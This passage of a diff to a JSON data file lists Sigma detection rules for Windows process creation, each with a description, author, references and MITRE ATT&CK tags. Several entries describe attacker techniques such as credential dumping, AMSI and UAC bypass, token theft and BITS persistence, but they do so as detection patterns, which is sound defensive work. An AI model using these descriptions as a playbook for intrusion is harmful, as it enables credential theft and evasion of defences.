"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ] + }, + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)" + }, + { + "description": "Detects wmiprvse spawning processes", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "value": "Wmiprvse Spawning Process" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "proc_creation_win_new_network_provider.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine" + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt" + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2020/10/05", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + "filename": "proc_creation_win_hack_hydra.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ] + }, + "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra Password Guessing Hack Tool" + }, + { + "description": "Execution of a renamed version of the Plink binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_plink.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ "attack.defense_evasion", "attack.t1036" ] }, - "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "value": "System File Execution Location Anomaly" + "uuid": 
"1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "value": "Execution Of Renamed Plink Binary" }, { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", + "author": "Christian Burkard", + "creation_date": "2021/08/31", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", + "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "value": "UAC Bypass Tools Using ComputerDefaults" + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + 
"https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641" + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_execution_path.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder" + }, + { + "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "meta": { + "author": "Alexander McDonald", + "creation_date": "2022/06/24", + "falsepositive": [ + "Legitimate use of Msra.exe" + ], + "filename": "proc_creation_win_msra_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", + "value": "Msra.exe Process Injection" + }, + { + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1197" + ] + }, + "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "value": "Monitoring For Persistence Via BITS" + }, + { + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "meta": { + "author": 
"Florian Roth, oscd.community", + "creation_date": "2020/07/30", + "falsepositive": [ + "Legitimate setups that use similar flags" + ], + "filename": "proc_creation_win_apt_winnti_pipemon.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", + "value": "Winnti Pipemon Characteristics" + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/16", + "falsepositive": [ + "NTDS maintenance" + ], + "filename": "proc_creation_win_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_rurat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", + "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location" + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ] + }, + "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing" + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": 
"Equation Group DLL_U Load" + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_pchunter.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags" + }, + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage" + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://ngrok.com/docs", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + 
"https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage" + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations" + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Legitimate use by a software developer." 
+ ], + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli" + }, + { + "description": "Detects file 
execution using the msdeploy.exe lolbin", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_msdeploy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "value": "Execute Files with Msdeploy.exe" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes" + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/17", + "falsepositive": [ + "Unlikely" + ], + 
"filename": "proc_creation_win_powershell_amsi_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "value": "Tamper Windows Defender Remove-MpPreference" + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection" }, { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "creation_date": "2018/09/03", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" ], - "filename": "proc_creation_win_tap_installer_execution.yml", + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line" + }, + { + "description": 
"Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dll_sideload_defender.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_pypykatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz" + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "meta": { + "author": "Florian 
Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole" + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ldifde_file_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": 
"6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage" + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program" + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges" + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe" + }, + { + "description": "Application Virtualization Utility is included with Microsoft Office. 
